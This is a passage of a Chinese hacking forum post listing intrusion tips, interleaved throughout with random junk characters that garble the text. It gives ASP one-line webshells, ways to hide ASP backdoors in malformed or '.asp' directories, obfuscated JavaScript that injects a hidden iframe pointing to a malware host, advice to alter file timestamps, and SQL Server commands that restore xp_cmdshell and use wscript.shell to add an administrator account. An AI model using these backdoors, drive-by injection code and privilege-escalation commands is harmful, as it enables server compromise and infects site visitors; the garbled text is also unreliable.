  z. T# O# E3 S8 A; f3 Ta).<%%25Execute(request("go"))%%25>( B5 {; e1 o5 M& p" R3 \
b).<%Execute(request("go"))%>9 L. p: I9 y! L4 V+ E# q
c).%><%execute request("go")%><%
: U2 ~! w1 @5 Z3 [5 Xd).<script language=VBScript runat=server>execute request("sb")</Script>
- w- d- a' p# [9 U) I7 @8 D6 Y2 l$ M# we).<%25Execute(request("l"))%25>$ i+ z$ e0 z; M. Z1 n/ }! u$ E: P0 N
f).<%if request("cmd")<>"" then execute request("pass")%>
- J; b: k6 v( g5 I$ a6 F
7 Q. c! ]! H* U" f5 D  T52、at "12:17" /interactive cmd6 m7 }8 C# b" Q+ l
执行后可以用AT命令查看新加的任务
6 ^; k4 }) S- F7 Y1 n6 K用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
4 p( u4 Z# G* F; R
$ l  R. u6 j$ f5 V5 i0 e1 _53、隐藏ASP后门的两种方法
5 h0 ?3 }6 g9 T' A  Z1、建立非标准目录:mkdir images..\  i/ L6 F( L$ u$ u5 l: ]/ \6 ^
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp% j9 d4 L! u; \. W, ^8 l* P) }
通过web访问ASP木马:http://ip/images../news.asp?action=login
" _; u; e+ r, ]如何删除非标准目录:rmdir images..\ /s% U1 h6 w$ m: G% G; N! `0 u
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
8 B: h2 \0 Q9 M7 D4 e! ^) ^mkdir programme.asp8 A9 g5 D0 m. ~$ V4 @/ L% }
新建1.txt文件内容:<!--#include file=”12.jpg”-->
4 ?7 ^9 N1 s$ n: b+ R新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
; w* i% g4 y# q$ u4 ^attrib +H +S programme.asp/ ~5 b5 v6 p" e0 l& z. P5 M
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
8 m4 f' {( y6 `# k
4 g: d# o  b, h! {8 d/ T, ^( @54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。: ]% u; a9 w6 k- u, w" K+ v
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。4 w! j& m' G9 J3 L9 U$ E1 \

0 o, Q, X% f' c55、JS隐蔽挂马3 t! E* W" L  d5 q! |& ^+ v7 G
1.$ V7 y8 v0 _/ [+ G+ b
var tr4c3="<iframe src=ht";
6 {& T/ Z$ X& ?: ztr4c3 = tr4c3+"tp:/";
. \: y+ p* [$ n& V* b+ @2 Itr4c3 = tr4c3+"/ww";6 w4 }' _( y  u1 ~. v8 E4 ~+ U
tr4c3 = tr4c3+"w.tr4";
- C- R% T- g! V7 H- Etr4c3 = tr4c3+"c3.com/inc/m";8 }- y" f* K6 Z7 n4 D
tr4c3 = tr4c3+"m.htm style="display:none"></i";
0 y1 O3 L( B+ [4 K  g* [6 ctr4c3 =tr4c3+"frame>'";5 X& y0 u1 x$ O4 o
document.write(tr4c3);
0 x% u, h5 i/ T5 Z, }, e避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。  {7 ~) h5 n+ O' w+ J$ W
4 ^% T0 C; _2 o- ]
2.3 o& C' C* b' }8 {. P
转换进制,然后用EVAL执行。如
; ?; X: E& I3 L' @+ Keval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");$ ?4 V  s7 \& A) C3 R" f
不过这个有点显眼。! P& z% X8 S! q$ p5 f2 O. l6 a
3.
: a& W& a/ l2 `- K& A, C# Edocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');) [& \; B8 q$ _2 l8 _: B  O
最后一点,别忘了把文件的时间也修改下。
0 q( y4 O, m, M( l8 f( s) e- K5 n- ]
" T! i1 N' N$ k" n4 u; Z& |' H56.3389终端入侵常用DOS命令) a% J- J% }. [9 X& |! ?" S3 j" _
taskkill taskkill /PID 1248 /t
" Z: M) p" r* j% c, ?8 g
  T6 @5 H% P- f( qtasklist 查进程
3 Y: W9 y9 e+ q! @: ]+ A' W) I. ?# b& ^% L& C
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限8 ]1 E/ n: D+ Y8 J6 x
iisreset /reboot* |1 A" _7 ^. e+ d  G
tsshutdn /reboot /delay:1    重起服务器
- g: I) g$ v" }3 p; f' X4 v# q" q" y
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,+ S9 ^6 ^, X. z- Y7 k0 d- ]: e

8 q7 j2 P- f% Rquery user 查看当前终端用户在线情况
8 }6 M& l' A$ R% V* l, y
: y1 d, r; D2 B5 X" p( {# o3 @要显示有关所有会话使用的进程的信息,请键入:query process *: Z! _& {+ u" d+ S$ e' J. I2 K0 `7 C

" m5 ?/ D! M% c+ R要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2! q2 ]/ o8 ^; s# u% c1 r

) e" H4 t( M1 X% l) p3 G' ~要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
  q! \3 x+ A- F2 u: r/ m2 |3 d
, v3 M+ Q# ?4 _+ \+ w6 f要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
1 P2 ~( _6 L' H) O1 I  z
4 K9 j( M+ |4 @8 g" w命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
6 y0 r  Z1 b5 _) b, e0 |3 p/ _3 B$ ?) D! A% Y8 |& `0 K# f$ [7 t* ^
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
, ?; n2 _+ o9 i" X3 s  u& c' f6 a2 Y+ P
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。2 t- m1 r$ Q) w' L5 r. U
* Z2 P8 ]" B# S
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机, H& I, A% `9 q

* z$ @5 Z7 v, R, W+ x* F  T56、在地址栏或按Ctrl+O,输入:
  |$ n0 M" W1 X2 t7 xjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;; e" Y" A( ^' J
& F  K* |* \: ]2 Q9 i
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。& l! ^6 b2 A2 V+ l( W. D  a6 k# O

& }( C" r4 q& X) X% a  ?/ q57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
2 Z* D2 U1 m4 J( }1 P, |% ]用net localgroup administrators是可以看到管理组下,加了$的用户的。6 }! J8 M4 u! d" n/ i6 W2 x8 Q

4 Y. S% \' g! j) S3 i, {58、 sa弱口令相关命令9 r2 _$ q( d6 _9 @0 z/ k

# h. z$ K6 b) b6 x一.更改sa口令方法:! `8 Q! H) B* K) Q
用sql综合利用工具连接后,执行命令:" X  r3 q7 b. }% Y# a! V: d6 Y
exec sp_password NULL,'20001001','sa'$ b9 Q! {. F0 o1 y1 @/ q0 B5 [
(提示:慎用!)# n" Y. H  v9 S$ \
) I$ T5 ]0 c) T7 F% e" \. {
二.简单修补sa弱口令.
) @) {6 ?- X6 ]8 N4 z2 o" h' k- Y+ R% r% P
方法1:查询分离器连接后执行:
% l9 U1 e* s. E% G, f8 M0 w3 q1 iif exists (select * from+ C+ H; \+ s8 a6 ?; X
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and( @- `8 v: T8 a- K% {
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
" W1 D8 I2 c% X" i% a1 @6 w' |" a# g) N- Q$ C6 n5 G
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'! O& \1 _, a) |: O7 z/ v
: }' G7 B2 _( i5 o
GO% h1 y5 _9 ]1 z) J7 E) {

0 v3 J- p, u( Q& n% Q然后按F5键命令执行完毕0 z; K. T5 v3 k4 B* W& r
  y) g/ I* n+ C/ B& A: a9 U8 }& _; s
方法2:查询分离器连接后
# ^0 w3 ^  r4 o! z) ^+ t第一步执行:use master
  P. c0 C$ n, `9 [( x4 m第二步执行:sp_dropextendedproc 'xp_cmdshell'" L! I( d2 p4 d! F0 Q) x) B6 T
然后按F5键命令执行完毕; s9 Z+ h7 d5 s: z  C: G# D
. B7 P! A, y* v$ B8 `
: J/ ?, n: z1 b4 |
三.常见情况恢复执行xp_cmdshell.4 q+ q9 Z. X$ }" n$ v& B5 ~

  O  k* t# h1 z3 h! y: R; L9 R+ J) a* k2 y0 C9 i8 k1 R0 l& P
1 未能找到存储过程'master..xpcmdshell'.+ f9 S: Y6 d! A8 j& U7 I: _
   恢复方法:查询分离器连接后,
& ?* R- K7 X  ^& i( `第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
# H5 {4 Y# I' _" x第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll': {1 k0 O" R% P9 J
然后按F5键命令执行完毕* L& R) j* E/ O0 O/ B0 ]% R! x4 e, O

( G- C  a3 v/ n. l2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
/ w& u$ K' g; u# x: X3 |! c恢复方法:查询分离器连接后,
1 c; O* p2 {; S4 `' v* |第一步执行:sp_dropextendedproc "xp_cmdshell"
/ u4 G! D( n6 `. U) L- c/ B  c( Q第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 H0 i9 N: y  X' i然后按F5键命令执行完毕% o' P: D6 l/ K& ]* X4 X

) W0 R0 Y, e" W) F3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( E% A- l1 ~  v! X* W/ h4 ~
恢复方法:查询分离器连接后,
/ Q9 H/ F. n! F* k第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
; v- e7 a. {% ~, s/ g. x$ P第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
  d$ B) V( Z# Z4 J, q8 @然后按F5键命令执行完毕
2 i" `2 P, f% R# \7 c) o8 f" s! y0 R. t- \# V8 N4 M# v
四.终极方法.( K% B$ {9 g) ?! u/ h
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
' g( e/ `. I5 p查询分离器连接后,' G3 _, u1 o: y4 l
2000servser系统:  I0 e; I8 X8 M+ _& r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'4 s& A, Y! s( c5 b

& A8 Q7 K0 |, L' V$ q- w4 U: ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
" {: L8 n; ~5 v- x" X$ t: B+ N5 l
0 V/ v2 z5 ?# Q5 xxp或2003server系统:. k7 B* G. W- E6 t! O
( G3 b7 ]# G. D; \* t3 _! }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
( L& K* ?' `9 |3 N( H: A- U( U( l* O, M  }- R. ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* f) P$ z# R% b- P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表